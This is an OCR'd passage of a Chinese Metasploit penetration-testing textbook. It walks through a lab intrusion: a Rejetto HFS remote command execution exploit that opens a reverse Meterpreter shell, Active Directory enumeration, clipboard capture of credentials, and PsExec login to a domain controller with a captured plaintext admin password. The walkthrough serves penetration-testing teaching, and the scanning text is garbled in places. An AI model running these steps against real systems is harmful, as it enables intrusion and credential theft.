910200ca-dc05-11e1-954f-406186ea4fc5 ARF xml Asset Reporting Format v1.0.0. 
9ca6fe72-1f62-11e1-9e7c-406186ea4fc5 NBE nbe Legacy OpenVAS report. 
9e5e5deb-879e-4ecc-8be6-a71cd0875cdd Topology SVG svg Network topology SVG image. 
a3810a62-1f62-11e1-9219-406186ea4fc5 TXT txt Plain text report. 
a684c02c-b531-11el-bdc2-406186ea4fc5 LaTeX tex LaTeX source file. 
ja994b278-1f62-11e1-96ac-406186ea4fc5 XML xml Raw XML report. 
c15ad349-bd8d-457a-880a-c7056532eel5 Verinice ISM vna Greenbone Verinice ISM Report, v3.0.0. 
c1645568-627a-11e3-a660-406186ea4fc5 CSV Results csv CSV result list. 
c402cc3e-b531-11e1-9163-406186ea4fc5 PDF pdf Portable Document Format report. 














将 报告 成 功 导 入 数据 库 之 后 ， 就 可 以 使 用 vulns 命令 查看 MSF 中 的 漏洞 数据 库 ， 如 下 图 所 示 。 


hsf > vulns 

[*] Time: 2018-03-30 11:09:59 UTC Vuln: host-192.168.0.196 name-HTTP File Server Remote Command Execution Vulnerability-01 Janl6 refs-C 
ME-2014-7226,BID-70216 

[*] Time: 2018-03-30 11:09:59 UTC Vuln: host-192.168.0.196 name-HTTP File Server Remote Command Execution Vulnerability-02 Janl6 refs-C 
MVE-2014-6287,BID-69782 

[*] Time: 2018-03-30 11:09:59 UTC Vuln: host-192.168.0.196 name-ICMP Timestamp Detection refs-CVE-1999-0524 

[*] Time: 2018-03-04 11:16:29 UTC Vuln: host-192.168.116.139 name-Stack Based Buffer Overflow Example refs- 

[*] Time: 2018-03-04 19:23:19 UTC Vuln: host-192.168.116.139 name-PCMAN FTP Server Post-Exploitation CWD Command refs- 

[*] Time: 2018-03-04 16:26:04 UTC Vuln: host-192.168.116.141 name-DEP Bypass Exploit refs- 

[*] Time: 2018-02-18 13:52:07 UTC Vuln: host-192.168.174.131 name-Generic Payload Handler refs- 


























所 有 的 漏洞 都 已 经 保存 到 了 数据 库 中 。 我 们 还 可 以 通过 浏览 器 访问 9392 端口 来 登录 Greenbone 
助手 ， 对 漏洞 数量 进行 交替 确认 ， 并 深入 了 人 解 这 些 漏 洞 的 细节 ， 如 下 图 所 示 。 
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Reporting Services 35 

erver MSRPC i 

Enumeration Cipher 25 

Detection 20 

wrapper am 

NASL 
Report 10 
5 
i ET EET TR Z: T TA AS TR 
NA 0 1 2 3 4 5 6 t 8 9 10 
10 imd ka] 
oem lo aleon TR om | 
HTTP File Server Remote Command Execution Vulnerability-02 Jan16 m 80% ^ 192.168.0.196 80/tcp Fri Mar 30 10:54:41 2018 
HTTP File Server Remote Command Execution Vulnerability-01 Jan16 DD BD 80% 192.168.0.196 80/tcp Fri Mar 30 10:55:14 2018 
DCE/RPC and MSRPC Services Enumeration Reporting iB ”Cn 80% 192.168.0.196 135/tcp Fri Mar 30 10:55:41 2018 
Missing "httpOnly”Cookie Attribute EB mum 80%  192.168.0.196 80/tcp Fri Mar 30 10:55:49 2018 
Services 80% 192.168.0.196 902/tcp Fri Mar 30 10:51:15 2018 
ICMP Timestamp Detection NENTTTNEM 8096 192.168.0.196 general/icmp Fri Mar 30 10:51:15 2018 
Services 8090 ^ 192.168.0.196 912/tcp Fri Mar 30 10:51:53 2018 
Tracerou! t 80%  192.168.0.196 general/tcp Fri Mar 30 10:51:53 2018 
Services 80% ^ 192.168.0.196 80/tcp Fri Mar 30 10:52:00 2018 
Services NEENTTTTNN 80% 192.168.0.196 22/tcp Fri Mar 30 10:52:05 2018 
VApply to page contents v ü 


























我 们 已 经 在 目标 主机 上 发 现 了 多 个 影响 很 大 的 漏洞 ， 现 在 正 是 对 威胁 区 域 进行 建 模 、 确 定 针对 目 
标 系 统 高 危 漏 洞 的 最 好 时 机 。 


6.1.4 ”对 威胁 区 域 进行 建 模 


在 进行 渗透 测试 的 时 候 最 先 考 虑 的 就 是 对 威胁 区 域 进行 建 模 。 这 个 阶段 最 重要 的 就 是 网 络 中 的 关 
键 区 域 ， 这 些 区 域 是 至 关 重 要 的 ， 同 时 它们 与 其 他 区 域 也 建立 着 连接 。 一 个 网 络 和 系统 是 否 脆弱 取决 
于 威胁 区 域 。 我 们 可 能 找到 了 很 多 目标 网 络 或 者 系统 的 漏洞 ， 但 是 这 些 漏洞 会 对 关键 区 域 造成 什么 样 
的 影响 才 是 我 们 最 关心 的 问题 。 这 个 阶段 的 研究 重点 是 如 何 消除 那些 对 组 织 资产 产生 最 高 威胁 的 漏 
洞 。 对 威胁 区 域 进行 建 模 将 会 帮助 我 们 对 目标 漏洞 进行 正确 的 设置 。 不 过 应 客户 要 求 ， 可 以 跳 过 这 个 
阶段 。 

分 析 目 标 可 能 产生 的 影响 ， 并 将 这 些 漏洞 与 可 能 产生 的 最 大 影响 进行 标记 是 十 分 必要 的 。 此 外 ， 
当 我 们 面 对 的 渗透 目标 是 一 个 大 型 网 络 的 关键 区 域 时 ， 威 胁 建 模 也 是 十 分 重要 的 。 
根据 OpenVAS 提供 的 扫描 结果 ,可 以 看 到 两 个 关于 DCE/RPC 和 MSRPC 服务 的 枚 举报 告 漏洞 ， 
但 是 由 于 当前 设备 位 于 网 络 内 部 ,因此 这 两 个 漏洞 不 会 对 基础 设施 造成 损害 ， 所 以 可 以 将 它们 排除 在 
我 们 的 渗透 测试 范围 之 外 。 同 时 ， 利 用 DOS 之 类 的 漏洞 进行 渗透 测试 可 能 会 引起 目标 计算 机 蓝屏 宕 
机 (Blue Screen of Death, BSOD )。 在 大 多 数 渗透 测试 中 ， 都 应 尽量 避免 使 用 Dog 攻击 方式 ， 除 非 我 
们 事先 征求 客户 同意 。 因 此 ， 跳 过 这 个 漏洞 ， 转 而 去 选择 一 个 靠得住 的 漏洞 一 一 HTTP 文件 服务 器 远 
程 代码 执行 漏洞 ( HTTP File Server Remote Command Execution Vulnerability ), 通过 在 OpenVAS 的 Web 
界面 浏览 这 个 漏洞 的 细节 ， 可 以 看 到 这 个 漏洞 对 应 的 编号 为 CVE 2014-6287。 接 着 在 Metasploit PÆ 
找 这 个 漏洞 对 应 的 渗透 模块 ， 很 快 便 会 找到 exoloit/windows/http/rejetto hfs exec 模块 ， 
查找 的 过 程 如 下 图 所 示 。 
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msf > search cve:2014-6287 


Matching Modules 





Name Disclosure Date Rank Description 


exploit/windows/http/rejetto hfs exec 2014-09-11 excellent Rejetto HttpFileServer Remote Command Execution 











6.1.5 获取 目标 的 控制 权限 
我 们 来 加 载 渗 透 模 块 ， 设 置 所 需 选 项 ， 通 过 漏洞 对 目标 进行 渗透 如 下 图 所 示 。 











msf > use exploit/windows/http/rejetto hfs exec 

sf exploit(rejetto hfs exec) > set RHOST 192.168.0.196 
RHOST -» 192.168.0.196 
msf exploit(rejetto hfs exec) » show options 


Module options (exploit/windows/http/rejetto hfs exec): 


Name Current Setting Required Description 

HTTPDELAY 10 no Seconds to wait before terminating web server 

Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RHOST 192.168.0.196 yes The target address 

RPORT 80 yes The target port (TCP) 

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 
SRVPORT 8080 yes The local port to listen on. 

SSL false no Negotiate SSL/TLS for outgoing connections 

SSLCert no Path to a custom SSL certificate (default is randomly generated) 
TARGETURI / yes The path of the web application 

URIPATH no The URI to use for this exploit (default is random) 

VHOST no HTTP server virtual host 


Exploit target: 


Id Name 


9 — Automatic 














现在 我 们 已 经 设置 好 了 所 有 的 参数 ， 接 下 来 只 需要 使 用 exploit 命令 启动 这 个 渗透 模块 ， 
过 程 如 下 图 所 示 。 











sf exploit(rejetto hfs exec) > exploit 


[*] Started reverse TCP handler on 192.168.0.111:4444 

[*] Using URL: http://0.0.0.0:8080/STqamVk6LUhJ 

[*] Local IP: http://192.168.0.111:8080/STqamVk6LUhJ 

[*] Server started. 

[*] Sending a malicious request to / 

[*] Payload request received: /STqamVk6LUhJ 

[*] Sending stage (179267 bytes) to 192.168.0.196 

[*] Meterpreter session 1 opened (192.168.0.111:4444 -» 192.168.0.196:12861) at 2018-03-30 16:44:34 40530 
Tried to delete *TEMP*XcsoBCwObU.vbs, unknown result 


[*] Server stopped. 
meterpreter » 


于 得 漂亮 ! 我 们 已 经 成 功 完 成 了 对 目标 系统 的 人 侵 , 接 下 来 使 用 一 个 后 渗透 测试 来 查看 目标 操作 
系统 的 类 型 。 




















Ax -> 
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meterpreter > sysinfo 
Computer : PYSSG002 
OS : Windows 
Architecture : x64 
System Language : en US 
Domain : PYSSG 
Logged On Users : 7 
Meterpreter : x86/wind 
meterpreter > 目 





10 (Build 16299). 


ows 








运行 sysinfo 命令 之 后 , 可 以 发 现 这 个 系统 的 类 型 为 64 位 的 Windows 10。 这 个 系统 位 于 一 个 名 











为 PYSSG 的 域 





1， 当 前 已 经 有 7 个 用 户 登 录 。 下 面 运行 arp 命令 搜索 网 络 中 的 其 





他 系统 。 





meterpreter > arp 

ARP cache 
IP address MAC addre 
169.254.255.255 ff:ff:ff 
192.168.0.1 b0:4e:26 
192.168.0.101 3c:a0:67 
192.168.0.102 00:50:56 
192.168.0.111 b0:10:41: 
192.168.0.124 48:0f:cf: 
192.168.0.190 00:50:56 
192.168.0.255 ff:ff:ff 
192.168.86.255 ff:ff:ff 
192.168.120.255 ff:ff:ff 





Interface 


iff: 
:77: 
:3b: 
:24: 
:46: 
:14: 
:d5: 
iff 
iff: 
iff 


ff 
bc 
19 
ca 
df 
7a 
69 
ff 
ff 
ff 
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这 时 我 们 就 可 以 考虑 对 Active Directory 的 结构 进行 测试 , HRA 
得 对 域 控制 器 的 访问 权限 。 

















F 多 系统 ， 不 过 我 们 知道 这 个 网 络 是 在 Active Directory 下 配置 的 。 














其 他 部 分 的 信息 ， 从 而 可 能 获 





6.1.6 ”使 用 Metasploit 完成 对 Active Directory 的 渗透 


现在 我 们 已 经 成 功 渗透 了 Active Directory ( AD) 


网 络 中 的 一 台 主 机 ， 下 面 就 要 找 出 这 个 网 络 的 























域 控制 器 并 尽 可 能 多 地 收集 关于 它 的 信息 ， 最 后 再 利 
1. 查找 域 控制 器 





j 这 些 信 息 完成 对 它 的 渗透 。 


enum, domain 模块 就 可 以 用 来 查找 域 控 制 器 ， 操 作 的 过 程 如 下 图 所 示 。 





msf post(enum domain) > show options 
Module options (post/windows/gather/enum i 


Current Setting Required De 


Name 


SESSION 1 Th 


msf post(enum domain) » run 
FOUND Domain: pyssg 


FOUND Domain Controller: PYSSGDCO1 (I 
[*] Post module execution completed 





domain): 
scription 


e session to run this module on. 


P: 192.168.0.190) 








6.1 使 用 Metasploit 集成 的 服务 完成 一 次 渗透 测试 171 




















从 上 图 中 可 以 看 到 , 我 们 搜集 到 了 很 多 有 用 的 信息 ， 例 如 域名 、 域 名 控制 器 以 及 它 的 卫 地 址 。 这 
个 模块 使 用 起 来 也 很 简单 ， 你 只 需要 提供 一 个 参数 的 值 就 可 以 完成 操作 ， 这 个 参数 就 是 那个 用 来 控制 
被 渗透 主机 的 会 话 标识 符 。 

2. 列举 出 Active Directory 网 络 中 的 共享 文件 

如 果 和 希望 查看 这 个 网 络 中 的 共享 文件 , 可 以 使 用 enum shares 这 个 模块 , 使 用 的 过 程 如 下 图 所 示 。 












































msf post(enum shares) > run 


[*] Running against session 2 

[*] The following shares were found: 
[*] Name: print$ 

[*] 

[*] Post module execution completed 


从 上 图 中 可 以 看 到 , 在 这 个 网 络 中 有 一 个 print 共享 文件 , 但 这 个 发 现 好 像 没有 什么 价值 。 没 关系 ， 
我 们 接着 来 尝试 一 些 其 他 的 模块 。 


3. 列举 出 Active Directory 网 络 中 的 主机 


下 面 使 用 enum domain computers 模块 来 查看 Active Directory 网 络 中 的 主机 信息 ， 查 看 的 过 
程 如 下 图 所 示 。 


msf > use post/windows/gather/enum ad computers 
msf post(enum ad computers) > show options 



































Module options (post/windows/gather/enum ad computers): 


Name Current Setting 
Required Description 





DOMAIN 
no The domain to query or distinguished name (e.g. D 
C-test,DC-com) 
FIELDS dNSHostName, distinguishedName, description,operatingSystem,operati 
ngSystemServicePack yes FIELDS to retrieve. 
FILTER (&(objectCategory-computer) (operatingSystem-*server*)) 
yes Search filter. 
MAX SEARCH 500 
yes Maximum values to retrieve, 0 for all. 
SESSION 
yes The session to run this module on. 
STORE DB false 
yes Store file in DB (performance hit resolving IPs). 
STORE LOOT false 
yes Store file in loot. 


msf post(enum ad computers) » set SESSION 1 
SESSION => 1 
msf post(enum ad computers) » run 





























在 上 图 中 可 以 看 到 我 们 只 设置 了 模块 中 的 一 个 参数 一 一 会 话 标识 符 。 下 面 运行 这 个 模块 并 分 析 结 果 。 
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Domain Computers 


dNSHostName distinguishedName descri 


ption operatingSystem 


PYSSGDCOl.pyssg.com  CN-PYSSGDCO1,0U-Domain Controllers,DC-pyssg,DC-com 
Windows Server 2016 Standard Evaluation 


[*] Post module execution 


operatingSystemServicePack 





completed 











从 上 图 中 可 以 看 到 ， 我们 获得 了 很 多 有 用 的 信息 ， 例 如 域名 信息 、 计 算 机 名 、OU,， 
到 目标 操作 系统 的 详细 版 本 信息 : Windows Server 2016 标准 版 。 这 可 是 一 个 非常 先进 的 朱 




















在 它 身 上 找到 漏洞 进行 渗透 是 个 很 有 挑战 性 的 难题 。 接 下 来 不 妨 继续 搜索 一 些 有 




















4. 列举 出 在 Active Directory 中 登录 的 用 户 
员 的 令 牌 在 Active Directory 中 “为 所 欲 为 ”。 下 面 首先 来 查看 一 


有 时 候 ， 我 们 可 以 通过 盗 取 管 理 员 
下 已 经 登录 到 这 个 网 络 的 用 户 。 





























甚至 可 以 看 
RERS, A 


用 的 信息 。 








msf post(enum logged on users) > use post/windows/gather/enum logged on users 


msf post(enum logged on users) » run 
[*] Running against session 1 


Current Logged Users 


SID 


User 


S-1-5-21-3559493541-3665875311-4193791800-1104 PYSSGWdeepankar 


Results saved in: /root/.msf4/loot/20180327031652 default 192.168.0.196 host.users.activ 306303.txt 


Recently Logged Users 


SID 


S-1-5-18 
S-1-5-19 
S-1-5-20 
S-1-5-21 
S-1-5-21 
S-1-5-21 


[*] Post module execution completed 


Profile Path 
*ssystemroot*system32 X config Nsystemprofile 
C: NWINDOWSNServiceProfilesNLocalService 

C: NWINDOWSNServiceProfilesWNetworkService 


-1059572653-748101817-2154812075-1005 — C: NUsersVFlash 
-3559493541-3665875311-4193791800-1104 C:\Users\deepankar 
-3559493541-3665875311-4193791800-1109 C:\Users\gaurav 











还 行 ， 我 们 找到 了 一 个 登录 到 系统 的 用 户 。 下 面 使 用 一 些 更 高 级 的 Metasploit 功能 来 搜集 这 个 网 


络 的 有 用 信息 。 
5. 列举 出 域 令 牌 


P PE SEA TENET post/windows/gather/enum domain tokens 模块 ， 








它 将 会 显示 当前 使 用 的 域 账户 信息 ， 


这 个 过 程 如 下 图 所 示 。 
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msf post(enum domain tokens) > run 


[*] Running module against PYSSG002 
[*] Checking local groups for Domain Accounts and Groups 


Account in Local Groups with Domain Context 


[*] Checking for Domain group and user tokens 








Group Member Domain Admin 
Administrators PYSSG\deepankar false 
Administrators PYSSGXDomain Admins false 
Users PYSSGXDomain Users false 


Delegation User PYSSGNdeep true 
Delegation User PYSSGNXdeepankar false 
Delegation User PYSSGNgaurav false 
Delegation Group PYSSGXDenied RODC Password Replication Group false 
Delegation Group PYSSGXDomain Admins false 
Delegation Group PYSSGXDomain Users false 


Domain Admin 








我 们 发 现 了 一 个 有 意思 的 结果 ， 


A, 我 们 在 “ 域 组 和 用 户 令 牌 ”列表 中 找到 了 一 个 很 有 意思 的 条 目 : des 











账号 deepankar 恰 好 正 是 这 人 台 机 需 的 本 地 管理 员 (local administrator )。 





它 就 是 域 管 
































也 意味 着 域 管理 员 可 以 从 这 人 台 机 器 登录 。 这 个 模块 还 可 以 列 出 用 户 的 运行 

[*] Checking for processes running under domain user 

Processes under Domain Context 

B=: 

Name PID Arch User Domain Admin 
ApplicationFrameHost.exe 10112 x64  PYSSGWMdeepankar false 
MSASCuiL.exe 232 x64  PYSSGWAdeep true 
Microsoft.Photos.exe 8028 x64  PYSSGWXdeepankar false 
MyDLP.Desktop.DesktopTray.exe 780 x86  PYSSG\deep true 
OneDriveSetup.exe 11512 x86 PYSSG\deep true 
OneDriveSetup.exe 10432 x86 PYSSG\deep true 
RuntimeBroker.exe 5504 x64  PYSSGXdeepankar false 
RuntimeBroker.exe 3960 x64  PYSSGXdeepankar false 
RuntimeBroker.exe 7228 x64  PYSSGXAdeepankar false 
RuntimeBroker.exe 9600 x64  PYSSGXdeepankar false 
RuntimeBroker.exe 9656 x64  PYSSGXdeepankar false 
RuntimeBroker.exe 9524 x64  PYSSGWMdeepankar false 
RuntimeBroker.exe 9572 x64  PYSSGWdeep true 
RuntimeBroker.exe 14488 x64 PYSSG\deep true 
RuntimeBroker.exe 15228 x64  PYSSGWdeep true 
RuntimeBroker.exe 15436 x64  PYSSGWdeep true 
RuntimeBroker.exe 2028 x64 PYSSG\deep true 
RuntimeBroker.exe 16404 x64 PYSSG\deep true 
RuntimeBroker.exe 2084 x64  PYSSGWdeep true 

12796 x64 — PYSSGNdeen true 
干 得 漂亮 ! 我 们 现在 看 到 了 所 有 的 本 地 管理 员 和 域 管 理 员 所 运行 的 进程 。 接 下 来 继续 








2É, 看 看 是 否 可 以 找到 更 多 的 信息 。 


员 的 账号 。 


过 程 , 使 用 方法 如 下 所 示 。 
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6. 在 Meterpreter 中 使 用 extapi 
在 扩展 API 的 帮助 下 , Windows 环境 中 的 Meterpreter 可 以 实现 很 多 新 功能 。 扩展 API 中 提供 了 对 
剪贴 板 操 作 、 查 询 服务 的 简单 访问 ， 枚 举 打 开 的 窗口 以 及 ADSL 查询 功能 。 


如 果 想 要 在 Metasploit PRAH IE API 的 话 ， 只 需要 使 用 命令 load 加 上 extapi 即 可 ， 这 个 过 
程 如 下 图 所 示 。 





















































meterpreter > load extapi 
Loading extension extapi...Success. 















































运行 上 图 所 示 的 命令 可 以 使 用 更 多 的 功能 ,如 果 需 要 查看 这 些 功能 的 帮助 信息 ,可 以 在 Meterpreter 
中 输入 ? ,执行 过 程 如 下 所 示 。 


tapi: Window Management Commands 





window enum Enumerate all current open windows 


service control Control a single service (start/pause/resume/stop/restart) 
service enum Enumerate all registered Windows services 
service query Query more detail about a specific Windows service 


tapi: Clipboard Management Commands 





clipboard get data Read the target's current clipboard (text, files, images) 
clipboard monitor dump Dump all captured clipboard content 

clipboard monitor pause Pause the active clipboard monitor 

clipboard monitor purge Delete all captured cilpboard content without dumping it 
clipboard monitor resume Resume the paused clipboard monitor 

clipboard monitor start Start the clipboard monitor 

clipboard monitor stop Stop the clipboard monitor 

clipboard set text Write text to the target's clipboard 


tapi: ADSI Management Commands 


Command Description 

adsi computer enum Enumerate all computers on the specified domain. 

adsi dc enum Enumerate all domain controllers on the specified domain. 

adsi domain query Enumerate all objects on the specified domain that match a filter. 

adsi group enum Enumerate all groups on the specified domain. 

adsi nested group user enum Recursively enumerate users who are effectively members of the group specified. 
adsi user enum Enumerate all users on the specified domain. 


tapi: WMI Querying Commands 


wmi query Perform a generic WMI query and return the results 
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7. 使 用 Metasploit 列举 出 打开 的 窗口 


扩展 API 中 的 window enum 可 以 列 出 被 渗透 主机 上 所 有 打开 的 窗口 。 这 可 以 帮助 我 们 掌握 目标 
以 及 运行 在 其 上 的 程序 的 更 多 信息 。 现 在 来 看 看 当 在 目标 系统 上 运行 这 个 模块 时 会 发 生 什么 。 



































meterpreter > window_enum 


Top-level windows 


744 66184 SecHealthHost 

744 1048638 MSCTFIME UI 

744 66186 Default IME 

1692 590708 Default IME 

2472 66082 Network Flyout 

2472 65992 Battery Meter 

2472 656546 NPI61E364 (HP LaserJet CP 1025nw) - Offline 
2472 984294  PrintUI QueueCreate 

2472 | 459582 Progress 

2472 | 196862 G 

2472 131600  BluetoothNotificationAreaIlconWindowClass 
2472 66070 MS WebcheckMonitor 

2472 131520 DDE Server Window 

2472 65848 DDE Server Window 


跟 设想 的 一 样 ，Meterpreter 中 列 出 了 目标 主机 上 所 有 打开 窗口 的 列表 以 及 它们 当前 的 进程 ID。 接 
着 再 仔细 地 查看 一 下 。 


4268 590682 Paste Options (Ctrl) 

4268 132300 Word 

4268 66198 Documentl - Word 

4268 66190 OfficePowerManagerWindow 

4268 66210 DDE Server Window 

4268 131738 MSCTFIME UI 

4268 262780 Default IME 

4576 — 131194 Windows Push Notifications Platform 

4576 65668 Default IME 

5208 262240 The Event Manager Dashboard 

5208 65786 MSCTFIME UI 

5208 262250 Default IME 

5308 262254  MediaContextNotificationWindow 

5308 262200 SystemResourceNotifyWindow 

5308 197118 .NET-BroadcastEventWindow.4.0.0.0.1a8clfa.0 
5308 262232 Default IME 

5584 1179732 HFS - HTTP File Server 2.3 Build 288 
5584 590736 Run script 

5584 393602 Addresses ever connected 

5584 393950 Customized options 


可 以 看 到 ， 目 标 系统 上 打开 了 微软 公司 的 word 程序 ， 这 表示 目前 正 有 人 在 使 用 这 人 台 计 算 机 。 
8. 剪贴 板 的 操作 


现在 我 们 已 经 获悉 目前 有 人 正在 使 用 这 台电 脑 ， 而且 也 可 以 使 用 扩展 API 的 功能 了 , 接 下 来 就 尝 
试 操作 目标 上 的 剪贴 板 ， 如 下 图 所 示 。 
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meterpreter > 

Clipboard 
meterpreter > 
Text captured 





clipboard monitor_start 
monitor started 
clipboard_monitor_dump 

at 2018-03-30 11:36:23.0582 





























Clipboard monitor dumped 
干 得 漂亮 ! 看 起 来 好 像 有 人 将 某 个 应 用 程序 的 用 户 名 和 密码 复制 到 剪贴 板 上 了 ! 等 等 ， 
192.168.0.190 正好 是 域 控 制 器 的 IP 地址 。 多 注意 一 下 这 些 用 户 名 和 密码 , 我 们 很 快 将 利用 


复杂 的 攻击 。 






































别 急 ， 
它们 进行 更 

















9. 使 用 Metasploit 中 的 ADSI 管理 命令 
"zh x4] pz E Tb sb Z^ 

我 们 现在 已 经 拥有 了 域 控制 器 上 的 一 些 关 键 的 用 户 名 与 密码 。 但 是 我 们 绝 不 能 止步 于 此 ， 继 续 探 
索 吧 ! 
meterpreter > adsi computer enum pyssg.com 
Ipyssg.com Objects 
name dnshostname distinguishedname operatingsystem operatings 
ystemversion operatingsystemservicepack description comment 
PYSSG002 . PYSSG002.pyssg.com CN-PYSSG002,CN-Computers,DC-pyssg,DC-com Windows 10 Pro 10.0 (1629 
9) 
PYSSG003  XPYSSG003.pyssg.com . CN-PYSSG003,CN-Computers,DC-pyssg,DC-com Windows 10 Pro 10.0 (1629 
9) 
PYSSG004 X PYSSG004.pyssg.com . CN-PYSSG004,CN-Computers,DC-pyssg,DC-com Windows 10 Pro 10.0 (1058 
6) 
PYSSGO05 X PYSSGOO05.pyssg.com X CN-PYSSGO005,CN-Computers,DC-pyssg, DC-com Windows 10 Pro 10.0 (1629 
9) 
PYSSGDCOl PYSSGDCOl.pyssg.com  CN-PYSSGDCO1,0U-Domain Controllers,DC-pyssg,DC-com Windows Server 2016 Standard Evaluation 10.0 (1439 
3) 
PYSSGV001 PYSSGV0Ol.pyssg.com  CN-PYSSGV001,CN-Computers , DC-pyssg, DC-com Windows 10 Pro 10.0 (1629 
9) 
Total objects: 6 

y * > 行 了 4 
我 们 在 adsi computer. enum 命令 后 面 添加 了 pyssg .com 参数 ， 并 执行 了 这 个 命令 ， 结 1 








列 出 了 当前 网 络 中 很 多 之 前 不 知道 的 主机 。 





看 我 们 还 得 到 了 哪些 有 用 的 信息 。 











这 些 主机 大 多 运行 着 Windows 10 专业 版 操作 系统 。 来 看 





meterpreter > adsi dc enum pyssg.com 





pyssg.com Objects 





name dnshostname distinguishedname 
ystemversion operatingsystemservicepack description comment 


operatingsystem 


operatings 


PYSSGDCO1 PYSSGDCOl.pyssg.com CN-PYSSGDCO1,0U-Domain Controllers,DC-pyssg,DC-com Windows Server 2016 Standard Evaluation 10.0 (1439 


Total objects: 1 
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另外 还 可 以 使 用 adsi dc. enum 命令 加 上 pyssg. com 的 方式 来 查找 域 控 制 器 ,这 个 pyssg .com 
就 是 上 图 中 所 使 用 的 那个 域名 。 命 令 adsi_user_enum 可 以 帮助 我 们 更 详细 地 查看 AD 用 户 ， 如 下 























图 所 示 。 
meterpreter > adsi user enum pyssg.com 
pyssg.com Objects 
samaccountname name distinguishedname description 
comment 
4n6 "ane CN-4n6, 0U-0PS , DC-pyssg, DC-com 
Administrator Administrator CN-Administrator,CN-Users,DC-pyssg, DC-com Built-in account for administering the compute 
BA cnt DefaultAccount CN=DefaultAccount, CN-Users , DC-pyssg, DC-com A user account managed by the system. 
Guest Guest CN=Guest, CN=Users,DC=pyssg,DC=com Built-in account for guest access to the compu 
(ter/domain 
PYSSG002$ PYSSGO002 CN-PYSSG092, CN-Computers , DC-pyssg, DC-com 
PYSSG003$ PYSSG003 CN-PYSSG003, CN-Computers , DC-pyssg, DC-com 
PYSSG004$ PYSSG004 CN-PYSSG004, CN-Computers , DC-pyssg, DC-com 
PYSSG005$ PYSSG005 CN-PYSSGO005 , CN-Computers , DC-pyssg, DC-com 
PYSSGDCO1$ PYSSGDCO1 CN-PYSSGDCO1,0U-Domain Controllers,DC-pyssg,DC-com 
PYSSGV001$ PYSSGV001 CN-PYSSGV001, CN-Computers , DC=pyssg, DC-com 
chaitanya Chaitanya Haritash CN=Chaitanya Haritash,0U=0PS,DC=pyssg,DC=com 
deep Deep Shankar Yadav CN=Deep Shankar Yadav ,0U=0PS ,DC=pyssg,DC=com 
deepankar Deepankar DA. Arora CN=Deepankar DA. Arora,0U=0PS,DC=pyssg,DC=com 
gaurav Gaurav Singh CN=Gaurav Singh,OU-O0PS,DC-pyssg,DC-com 








我 们 在 这 里 只 发 现 了 一 个 OU。 仔 细 查 看 上 图 可 以 发 现 ， 默 认 OU 为 OPS。 
10. 在 网 络 中 使 用 PsExec 渗透 模块 


在 前 面 的 章节 中 我 们 获得 了 一 些 用 户 名 和 密码 。 现 在 要 在 Metasploit 的 psexec 模块 中 使 用 这 些 
信息 来 获取 域 控 制 器 的 控制 权限 。 下 面 的 内 容 来 自 微软 官方 网 站 。 
"PsExec 是 作为 telnet 的 轻 量 级 替代 品 开发 出 来 的 ， 利 用 它 可 以 在 其 他 系统 上 执行 进程 。 
你 可 以 在 无 须 安装 客户 端的 情况 下 ， 实 现 与 控制 台 程序 的 完美 互动 。PsExec 最 强大 的 用 途 包 
括 在 远程 系统 上 启动 交互 式 命令 提示 符 , 以 及 远程 启用 IpConfig 等 可 以 显示 远程 系统 信息 的 
i 


vo 


PsExec 这 个 模块 主要 用 来 实现 pass-the-hash 攻击 ， 这 种 情况 下 攻击 者 往往 获悉 了 密码 的 散 列 值 ， 
但 是 尚未 从 这 个 散 列 值 还 原 出 密码 的 值 。 这 个 模块 可 以 利用 密码 的 散 列 值 登录 到 目标 系统 上 ， 从 而 执 
行 各 种 命令 。 不 过 现在 我 们 已 经 知道 了 目标 的 明文 密码 值 ， 所 以 直接 使 用 这 个 模块 就 可 以 登录 到 域 控 
制 器 。 下 面 给 出 了 这 个 模块 的 使 用 方法 。 
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Imsf exploit(psexec) > show options 


Module options (exploit/windows/smb/psexec): 


Name Current Setting Required Description 

RHOST yes The target address 

RPORT 445 yes The SMB service port (TCP) 

SERVICE DESCRIPTION no Service description to to be used on target for pretty listing 

SERVICE DISPLAY NAME no The service display name 

SERVICE NAME no The service name 

SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/wri 
te folder share 

SMBDomain . no The Windows domain to use for authentication 

SMBPass no The password for the specified username 

SMBUser no The username to authenticate as 


Exploit target: 


Id Name 


0 Automatic 





msf exploit(psexec) > set RHOST 192.168.0.190 
HOST => 192.168.0.190 

msf exploit(psexec) > set SMBUser administrator 
SMBUser => administrator 

msf exploit(psexec) > set SMBPASS CharlieQ1337 
SMBPASS => Charlie@1337 

msf exploit(psexec) > set SMBDomain pyssg.com 
SMBDomain => pyssg.com 

msf expLoit(psexec) > run 


我 们 已 经 设置 好 了 所 有 的 选项 ， 下 面 开 始 执行 并 分 析 执行 结果 。 


sf exploit(psexec) > exploit 

















[*] Started reverse TCP handler on 192.168.0.111:4444 

[*] 192.168.0.190:445 - Connecting to the server... 

[*] 192.168.0.190:445 - Authenticating to 192.168.0.190:445|pyssg.com as user 'administrator'... 

[*] 192.168.0.190:445 - Selecting PowerShell target 

[*] 192.168.0.190:445 - Executing the payload... 

192.168.0.190:445 - Service start timed out, OK if running a command or non-service executable... 

[*] Sending stage (179267 bytes) to 192.168.0.190 

[*] Meterpreter session 5 opened (192.168.0.111:4444 -» 192.168.0.190:57152) at 2018-03-30 17:42:36 40530 





meterpreter > 目 


做 得 很 棒 ! 我 们 已 经 成 功 获取 了 域 服务 器 的 控制 权 。 尝 试 几 个 后 渗透 模块 ， 来 看 看 是 否 能 成 功 。 











meterpreter > sysinfo 

Computer : PYSSGDCO1 

oS : Windows 2016 (Build 14393). 
Architecture : x64 

System Language : en US 

Domain : PYSSG 

Logged On Users : 4 

Meterpreter : X86/windows 

meterpreter > 目 








没 错 ! 我 们 已 经 成 功 完 成 了 对 Windows 2016 服务 器 的 渗透 。 尽 管 这 个 服务 器 没有 任何 严重 的 漏 
洞 ， 但 是 在 访问 权限 控制 上 却 存在 着 缺陷 。 











meterpreter > getuid 
Server username: NT AUTHORITYNSYSTEM 


meterpreter » getpid 
Current pid: 4388 


meterpreter > 目 


现在 已 经 拥有 了 服务 器 的 系统 级 控制 权限 ， 我 们 几乎 可 以 对 它 为 所 欲 为 了 。 
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11. 在 Metasploit 中 使 用 Kiwi 


Metasploit 中 提供 了 用 来 实现 针对 登录 和 赁 


和 散 列 值 的 导出 、 内 存 中 密码 的 导出 、 
